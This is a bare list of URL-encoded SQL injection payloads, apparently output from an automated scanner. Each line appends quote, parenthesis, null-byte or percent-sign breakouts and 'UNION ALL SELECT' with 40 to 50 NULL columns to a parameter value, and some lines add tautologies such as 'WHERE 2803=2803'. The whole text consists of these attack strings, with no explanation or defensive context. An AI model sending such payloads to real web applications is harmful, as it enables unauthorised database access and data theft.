1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%202803%3D2803%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%204997%3D4997%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%202757%3D2757%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%207074%3D7074%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%208935%3D8935%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%201791%3D1791%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20WHERE%203459%3D3459%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 